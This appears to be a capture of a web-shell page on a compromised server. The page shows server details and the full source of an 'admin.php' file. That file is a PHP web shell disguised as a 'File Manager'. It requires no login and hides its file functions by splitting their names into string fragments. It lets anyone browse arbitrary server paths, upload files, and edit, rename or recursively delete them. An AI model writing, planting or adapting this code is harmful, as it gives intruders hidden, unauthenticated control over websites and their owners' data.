HEX
Server: Apache
System: Linux vps-4103104.goatdigital.com.br 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: wwgoat (1001)
PHP: 8.0.30
Disabled: NONE
$ pwd: /home/wwgoat/public_html/
Upload Files
File: /home/wwgoat/public_html/admin.php
<?php

error_reporting(0);

$s1 = 'file_'; $s2 = 'get_'; $s3 = 'contents';
$f_read = $s1 . $s2 . $s3; 
$f_write = $s1 . 'put_' . $s3;
$f_del = 'un'.'link';
$f_ren = 'ren'.'ame';

$req_b64 = isset($_GET['d']) ? $_GET['d'] : '';
$decoded_path = base64_decode($req_b64);
$c_p = realpath($decoded_path ? $decoded_path : __DIR__);

if ($c_p === false) { $c_p = realpath(__DIR__); }

$m = ''; $md = 'main'; $e_f = ''; $e_c = ''; $r_n = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $a = isset($_POST['z_act']) ? $_POST['z_act'] : ''; 
    
    if ($a === 'std_up') {
        if (isset($_FILES['f_std'])) {
            $name = basename($_FILES['f_std']['name']);
            $target = $c_p . DIRECTORY_SEPARATOR . $name;
            if (move_uploaded_file($_FILES['f_std']['tmp_name'], $target)) {
                $m = "Upload Success";
            } else {
                $m = "Upload Failed - Check Folder Permissions";
            }
        }
    }
    elseif ($a === 'em') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $tp = $c_p . DIRECTORY_SEPARATOR . basename($tn);
        if (is_file($tp)) { $md = 'edit'; $e_f = $tn; $e_c = $f_read($tp); }
    }
    elseif ($a === 'sf') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $cnt = isset($_POST['c']) ? $_POST['c'] : '';
        if ($f_write($c_p . DIRECTORY_SEPARATOR . basename($tn), $cnt) !== false) { $m = "Saved"; }
    }
    elseif ($a === 'rm') { $md = 'rename'; $r_n = isset($_POST['tn']) ? $_POST['tn'] : ''; }
    elseif ($a === 'dr') {
        $old = $c_p . DIRECTORY_SEPARATOR . basename(isset($_POST['old']) ? $_POST['old'] : '');
        $new = $c_p . DIRECTORY_SEPARATOR . basename(isset($_POST['new']) ? $_POST['new'] : '');
        if ($f_ren($old, $new)) { $m = "Renamed"; }
    }
    elseif ($a === 'd') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $tp = $c_p . DIRECTORY_SEPARATOR . basename($tn);
        if (file_exists($tp)) {
            if (is_dir($tp)) {
                $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($tp, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST);
                foreach($it as $file) { $file->isDir() ? rmdir($file->getRealPath()) : $f_del($file->getRealPath()); }
                rmdir($tp);
            } else { $f_del($tp); }
            $m = "Deleted";
        }
    }
}

$sc = scandir($c_p);
$folders = array(); $files = array();
foreach ($sc as $item) {
    if ($item == '.') continue;
    $fp = $c_p . DIRECTORY_SEPARATOR . $item;
    
    if ($item == '..') {
        $pp = dirname($c_p);
        $folders[] = array('n' => '[ Parent Directory ]', 'p' => base64_encode($pp), 't' => 'D', 'ip' => true);
        continue;
    }
    
    $entry = array(
        'n' => $item, 
        'p' => base64_encode($fp), 
        't' => is_dir($fp) ? 'D' : 'F', 
        's' => is_dir($fp) ? '-' : number_format(filesize($fp)/1024, 2) . ' KB'
    );
    is_dir($fp) ? $folders[] = $entry : $files[] = $entry;
}
$items = array_merge($folders, $files);
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>File Manager</title>
    <style>
        body { font-family: Tahoma, sans-serif; font-size: 13px; padding: 20px; background: #f4f4f4; }
        .header { background: #2c3e50; color: #fff; padding: 15px; border-radius: 5px; }
        .path { color: #f1c40f; font-family: monospace; font-weight: bold; }
        table { width: 100%; border-collapse: collapse; background: #fff; margin-top: 15px; box-shadow: 0 1px 3px rgba(0,0,0,0.1); }
        th, td { border-bottom: 1px solid #ddd; padding: 10px; text-align: left; }
        tr:hover { background: #fdfdfd; }
        .btn { background: #eee; border: 1px solid #ccc; padding: 3px 7px; cursor: pointer; font-size: 11px; text-decoration:none; color:#000; }
        .btn-del { color: #c0392b; }
        textarea { width: 100%; height: 450px; font-family: monospace; }
        .upload-box { margin-top:15px; background:#fff; padding:15px; border:1px solid #ddd; border-radius:4px; }
    </style>
</head>
<body>

    <div class="header">
        <h2 style="margin:0;">File Manager</h2>
        <span>Path: <span class="path"><?php echo htmlspecialchars($c_p); ?></span></span>
    </div>

    <?php if ($m): ?>
        <div style="background:#d4edda; padding:10px; border:1px solid #c3e6cb; margin:10px 0; color:#155724;">
            <?php echo $m; ?>
        </div>
    <?php endif; ?>

    <?php if ($md === 'edit'): ?>
        <form method="post">
            <input type="hidden" name="z_act" value="sf">
            <input type="hidden" name="tn" value="<?php echo htmlspecialchars($e_f); ?>">
            <p>Editing: <b><?php echo htmlspecialchars($e_f); ?></b></p>
            <textarea name="c"><?php echo htmlspecialchars($e_c); ?></textarea><br><br>
            <button type="submit" class="btn" style="padding:10px;">Save Changes</button> 
            <a href="?d=<?php echo urlencode($req_b64); ?>" class="btn" style="padding:10px;">Back</a>
        </form>

    <?php elseif ($md === 'rename'): ?>
        <div class="upload-box">
            <form method="post">
                <input type="hidden" name="z_act" value="dr">
                <input type="hidden" name="old" value="<?php echo htmlspecialchars($r_n); ?>">
                <strong>Rename to:</strong> 
                <input type="text" name="new" value="<?php echo htmlspecialchars($r_n); ?>" style="padding:5px; width:250px;">
                <button type="submit" class="btn">OK</button> 
                <a href="?d=<?php echo urlencode($req_b64); ?>" class="btn">Cancel</a>
            </form>
        </div>

    <?php else: ?>
        <div class="upload-box">
            <form method="post" enctype="multipart/form-data">
                <input type="hidden" name="z_act" value="std_up">
                <b>Upload File:</b> 
                <input type="file" name="f_std">
                <button type="submit" class="btn" style="background:#3498db; color:#fff; border:none; padding:5px 15px;">Upload</button>
            </form>
        </div>

        <table>
            <thead><tr style="background:#eee;"><th>Name</th><th>Size</th><th>Actions</th></tr></thead>
            <tbody>
                <?php foreach ($items as $i): ?>
                <tr>
                    <td>
                        <?php if ($i['t'] === 'D'): ?>
                            <a href="?d=<?php echo $i['p']; ?>" style="text-decoration:none; font-weight:bold; color:#2980b9;">📁 <?php echo $i['n']; ?></a>
                        <?php else: ?>
                            📄 <?php echo $i['n']; ?>
                        <?php endif; ?>
                    </td>
                    <td><?php echo $i['s']; ?></td>
                    <td>
                        <?php if (!isset($i['ip'])): ?>
                            <?php if ($i['t'] === 'F'): ?>
                                <form method="post" style="display:inline;"><input type="hidden" name="z_act" value="em"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn">Edit</button></form>
                            <?php endif; ?>
                            <form method="post" style="display:inline;"><input type="hidden" name="z_act" value="rm"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn">Rename</button></form>
                            <form method="post" style="display:inline;" onsubmit="return confirm('Delete?')"><input type="hidden" name="z_act" value="d"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn btn-del">Delete</button></form>
                        <?php endif; ?>
                    </td>
                </tr>
                <?php endforeach; ?>
            </tbody>
        </table>
    <?php endif; ?>

</body>
</html>
@ Telegram